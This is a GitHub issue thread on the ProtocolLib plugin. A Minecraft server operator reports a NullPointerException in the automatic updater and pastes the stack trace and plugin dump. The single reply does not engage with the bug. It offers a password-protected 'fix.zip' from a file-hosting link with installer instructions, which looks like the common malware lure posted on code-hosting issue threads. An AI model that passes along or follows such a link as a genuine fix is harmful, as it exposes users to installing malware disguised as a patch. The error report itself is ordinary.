### ISSUE TITLE
INTERNAL ERROR: Cannot perform automatic updates

### ISSUE THREAD

**Issue by Guntherhausen** [dmulloy2/ProtocolLib#3204]
**Make sure you're doing the following**
- [x] You're using the latest build for your server version
- [x] This isn't an issue caused by another plugin
- [x] You've checked for duplicate issues
- [x] You didn't use `/reload`

**Describe the question**
Did anybody have this error already? There is some code underneath which it gave us.

**API method(s) used**
This issue happens as soon as we started using orebfuscator (which needs ProtocolLib) and ProtocolLib, this happens with only ProtocolLib enabled.

**Expected behavior**
Maybe somebody had this Problem already and knows a Solution to this, its not big of a Deal but maybe its solveable.

**Code**
[Server thread/ERROR]:   [ProtocolLib] INTERNAL ERROR: Cannot perform automatic updates.
  If this problem hasn't already been reported, please open a ticket
  at https://github.com/dmulloy2/ProtocolLib/issues with the following data:
  Stack Trace:
  java.lang.NullPointerException: Cannot invoke "com.comphenix.protocol.updater.Updater.isChecking()" because "this.updater" is null
        at com.comphenix.protocol.ProtocolLib.checkUpdates(ProtocolLib.java:514)
        at com.comphenix.protocol.ProtocolLib.lambda$createPacketTask$0(ProtocolLib.java:485)
        at org.bukkit.craftbukkit.v1_21_R1.scheduler.CraftTask.run(CraftTask.java:77)
        at org.bukkit.craftbukkit.v1_21_R1.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:414)
        at net.minecraft.server.MinecraftServer.c(MinecraftServer.java:1382)
        at net.minecraft.server.dedicated.DedicatedServer.c(DedicatedServer.java:393)
        at net.minecraft.server.MinecraftServer.a(MinecraftServer.java:1284)
        at net.minecraft.server.MinecraftServer.y(MinecraftServer.java:1036)
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:310)
        at java.base/java.lang.Thread.run(Thread.java:1570)
  Dump:
    manager:
      com.comphenix.protocol.injector.PacketFilterManager@3d1aa4de[
        plugin=ProtocolLib v5.3.0-SNAPSHOT-726
        server=CraftServer{serverName=CraftBukkit,serverVersion=4226-Bukkit-2889b3a,minecraftVersion=1.21}
        reporter=com.comphenix.protocol.ProtocolLib$1@10522fb
        minecraftVersion=(MC: 1.21.0)
        asyncFilterManager=com.comphenix.protocol.async.AsyncFilterManager@57bc4414
        pluginVerifier=com.comphenix.protocol.injector.PluginVerifier@3fe82669
        mainThreadPacketTypes=com.comphenix.protocol.concurrent.PacketTypeListenerSet@533cd0ca
        inboundListeners=com.comphenix.protocol.injector.collection.InboundPacketListenerSet@7b0632ac
        outboundListeners=com.comphenix.protocol.injector.collection.OutboundPacketListenerSet@4e2f453c
        registeredListeners=[PacketAdapter[plugin=Orebfuscator, sending=ListeningWhitelist[priority=NORMAL, packets=[UNLOAD_CHUNK[class=PacketPlayOutUnloadChunk, id=33]], gamephase=PLAYING, options=[]], receiving=EMPTY_WHITELIST], com.comphenix.protocol.async.NullPacketListener@36d11daa]
        networkManagerInjector=com.comphenix.protocol.injector.netty.manager.NetworkManagerInjector@308ae9fe
        debug=false
        closed=false
        injected=true
      ]
  Sender:
    com.comphenix.protocol.ProtocolLib@4f5c04eb[
      statistics=com.comphenix.protocol.metrics.Statistics@7beeae99
      packetTask=com.comphenix.protocol.scheduler.DefaultTask@1ccc6d03
      tickCounter=20
      configExpectedMod=1
      updater=<null>
      redirectHandler=com.comphenix.protocol.ProtocolLib$2@374f2bd2
      scheduler=com.comphenix.protocol.scheduler.DefaultScheduler@189b0a8c
      commandProtocol=com.comphenix.protocol.CommandProtocol@168fe560
      commandPacket=com.comphenix.protocol.CommandPacket@695436c7
      commandFilter=com.comphenix.protocol.CommandFilter@270b9184
      packetLogging=com.comphenix.protocol.PacketLogging@67843083
      skipDisable=false
      isEnabled=true
      loader=org.bukkit.plugin.java.JavaPluginLoader@e497df6
      server=CraftServer{serverName=CraftBukkit,serverVersion=4226-Bukkit-2889b3a,minecraftVersion=1.21}
      file=plugins\ProtocolLib.jar
      description=org.bukkit.plugin.PluginDescriptionFile@466390f6
      dataFolder=plugins\ProtocolLib
      classLoader=org.bukkit.plugin.java.PluginClassLoader@f22d17b
      naggable=true
      newConfig=YamlConfiguration[path='', root='YamlConfiguration']
      configFile=plugins\ProtocolLib\config.yml
      logger=org.bukkit.plugin.PluginLogger@7bd98117
    ]
  Version:
    ProtocolLib v5.3.0-SNAPSHOT-726
  Java Version:
    22.0.2
  Server:
    4226-Bukkit-2889b3a (MC: 1.21)

**Additional context**
//

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
